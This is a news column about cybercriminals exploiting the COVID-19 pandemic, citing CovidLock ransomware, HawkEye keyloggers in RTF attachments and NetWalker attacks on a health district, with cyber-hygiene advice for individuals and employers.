“There's a special ring of hell reserved for those who take advantage of a public health crisis to make money,” says Adam Levin, founder and chairman of CyberScout, a Scottsdale, AZ-based supplier of identity and data theft recovery services. I agree wholeheartedly with Levin on this, as I imagine most folks would.
“While this kind of fraud is the new normal, often fine-tuned for specific holidays and big news stories, a global health disaster creates an even more fertile field than usual for fraudsters,” Levin observes. “There is no population or demographic that isn't paying attention. As a result, the potential for impulse clicking is higher than usual.”
A much bigger problem is this: with so much going on, most folks do not realize, just yet, that any escalation in coronavirus-themed attacks will only serve to add confusion to an already chaotic situation – and thus exacerbate delays.
What people will eventually come to realize, the sooner the better, is that we will need to flatten the X factor represented by cybercrime. Individual citizens, as well as companies, need to start practicing digital distancing, as much as human distancing. Here’s what everyone should realize about the responsibility to practice rigorous cyber hygiene, now more than ever:
Attacks in the wild
Social engineering invariably is the first step in cyber attacks ranging from phishing and ransomware to business email compromise (BEC) scams and advanced persistent threats (APT) hacks. Going forward, consumers and companies need to prepare for the likelihood that the trajectory of coronavirus-themed cyber attacks will likely match the trajectory of the spread of the disease. It’s already happening.
Firewall supplier Check Point Software Technologies has reported a massive surge in the registration of coronavirus-related domains, since Jan. 2. While this is to be expected as response and recovery efforts ramp up, Check Point analysts say fully half of these new domains are likely to be in support of criminal activities.
What form is this cyber badness taking? Researchers at Seattle-based forensics tools vendor DomainTools found one domain enticing Android smartphone users to download an Android App displaying a spiffy Coronavirus heat map, updating key stats about the unfolding pandemic.
Unseen, the app also embeds a copy of CovidLock, ransomware malware that executes a password change, locks out the user and demands $100 in Bitcoin to restore access, with a 48 hour deadline to pay the ransom. This variant of a screen-lock attack further threatens to erase the phone’s memory, including contacts, pictures and videos, as well as publicly post all of that sensitive personal information to the victim’s go-to social media accounts.
Businesses are being heavily targeted, as well. Researchers at Votiro, which helps companies defend against weaponized emails, have been intercepting variants of the notorious HawkEye keystroke logging malware circulating very cleverly inside RTF text files.
The RTF files are being sent as benign attachments in email with a clumsily spelled subject line: “coronavirus cure.” Clicking on the file activates a macro, which very stealthily leverages Microsoft Windows PowerShell tool to embed the malware. This variant of HawkEye, like earlier versions, captures keystrokes and screenshots, with a focus on stealing account logins.
“Fear of the coronavirus pandemic has not stopped the work of cybercriminals,” Aviv Grafi, Votiro’s founder and CEO, told me. “Instead it’s given them more ammunition to wreak havoc . . . and their rate of penetration has been boosted by the explosion of organizational communications around COVID-19.”
Targeting key sectors
The healthcare sector and local governments carry a huge burden and must communicate extensively and exhaustively to get us clear of COVID-19. What we know is that municipalities and hospitals have been prime targets of ransomware purveyors over the past two years.
Assuming the top criminal hacking groups behave as you’d expect – and build off established attack vectors to pursue maximum illicit profits above all else – we’re in for waves of coronavirus-themed cyber attacks targeting these two critical sectors.
Threat management vendor RiskIQ, for one, is warning that cybercriminals are likely to exploit global anxiety to prey on large corporations in precarious situations because they are part of supply chains in Coronavirus hotspots.
RiskIQ analyst Aaron Inness predicts we’ll soon see a rise in “layered attack campaigns” that commence with phishing and social engineering ruses and escalate to deeper network probes to wreak havoc and/or profit criminally. The extortion-motivated disruption of the Champaign-Urbana Public Health District's website, taken out by NetWalker ransomware, is an early example.
Leaders of the top hacking collectives are astute and disciplined. They understand the opportunities presented by the fact that executives, managers and subordinates are under heavy pressure to follow the latest developments, respond to email and click to websites quickly. They know full well it only takes one overworked, well-intentioned health worker or county official – working remotely – to click on a weaponized email attachment or URL.
A call to cyber hygiene
It’s imperative for each one of us to adopt the mindset of becoming less of an easy target for cyber criminals. For all individual computing device users, think twice before you open an email attachment, click to a link or download a new mobile app. Do you really need to do it? Can you otherwise verify what you’re about to click on is safe?
“If you want the latest news or views on the virus, go to trusted sources which you should bookmark for additional protection,” advises Levin. “Make sure you do everything possible to secure your mobile devices and that both the firmware and software are routinely updated. Backup your data frequently on hard drives that aren't connected 24/7 to the internet. Always remember. Never trust. Always question. Always verify.”
Employers now dealing with a spike in employees working from home need to adjust logics to account not just for convenience and efficiency – but especially for cybersecurity.
It’s time to review and reinforce remote access security policies, especially in the areas of authentication and privileged access. Equally important is a review and reinforcement of security policies for use of cloud-based services, including productivity suites, collaboration tools, storage, infrastructure and platforms.
Just as companies tighten down network access and security policies for employees, they must also do it for third party contractors: everyone from DevOps software developers to the heating and ventilating vendor.
Cyber hygiene is no longer a best practice to aspire to, it’s a key component to getting us past the unfolding global pandemic. I’ll keep watch.